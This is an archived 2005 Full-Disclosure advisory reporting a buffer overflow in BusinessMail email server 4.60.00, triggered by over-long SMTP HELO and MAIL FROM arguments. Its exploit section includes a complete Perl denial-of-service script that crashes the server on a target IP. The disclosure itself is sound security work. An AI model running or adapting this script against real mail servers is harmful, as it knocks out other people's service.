[Full-disclosure] Buffer overflow in BusinessMail email server system 4.60.00

From: Reed Arvin (reedarvin_at_gmail.com)
Date: 08/01/05

  • Next message: Dinis Cruz: "Re: [Full-disclosure] Did you miss us yet?"
    Date: Sun, 31 Jul 2005 22:07:02 -0700
    To: vuln@secunia.com, news@securiteam.com, full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
    
    

    Summary:
    Buffer overflow in BusinessMail email server system 4.60.00
    (http://www.netcplus.com/)

    Details:
    Input to the SMTP HELO and MAIL FROM: commands is not properly checked
    and/or filtered. Issuing a long argument to the HELO and MAIL FROM:
    commands will cause the corresponding process to die.

    Vulnerable Versions:
    BusinessMail email server system 4.60.00

    Patches/Workarounds:
    The vendor was notified of the issue. A patch will be release shorly.
    The patch will be made available via the vendor's web site
    (http://www.netcplus.com/).

    Exploits:
    Run the following PERL script against the server. The corresponding
    process will die.

    #===== Start BusMail_SMTPDOS.pl =====
    #
    # Usage: BusMail_SMTPDOS.pl <ip>
    # BusMail_SMTPDOS.pl 127.0.0.1
    #
    # BusinessMail email server system 4.60.00
    #
    # Download:
    # http://www.netcplus.com/
    #
    ##########################################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "25",
                                        Proto => "TCP"))
    {
            print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";

            sleep(1);

            print $socket "HELO " . "A" x 512 . "\r\n";

            sleep(1);

            print $socket "MAIL FROM:" . "A" x 512 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:25\n";
    }
    #===== Start BusMail_SMTPDOS.pl =====

    Discovered by Reed Arvin reedarvin[at]gmail[dot]com
    (http://reedarvin.thearvins.com/)

    Vulnerability discovered using PeachFuzz
    (http://reedarvin.thearvins.com/tools.html)
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Dinis Cruz: "Re: [Full-disclosure] Did you miss us yet?"